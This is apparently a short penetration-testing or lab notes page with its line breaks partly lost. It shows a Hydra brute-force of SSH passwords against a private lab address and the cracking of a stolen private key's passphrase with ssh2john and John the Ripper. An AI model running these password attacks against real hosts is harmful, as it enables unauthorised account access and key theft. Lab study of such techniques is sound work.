SSH Brute and Private Key Passphrase Crack
hydra -l james -P /usr/share/wordlists/rockyou.txt -s 2222 ssh://192.168.13.37chmod 600 id_rsa # Assuming you moved the file
ssh -i id_rsa -p 2222 [email protected]
Enter passphrase for key 'id_rsa': #Wrong password
Enter passphrase for key 'id_rsa': #Wrong password
Enter passphrase for key 'id_rsa': #Wrong passwordssh2john id_rsa > ssh.hash
cat ssh.hash
id_rsa:$sshng$6$16$77059e
john --wordlist=rockyou.txt ssh.hashLast updated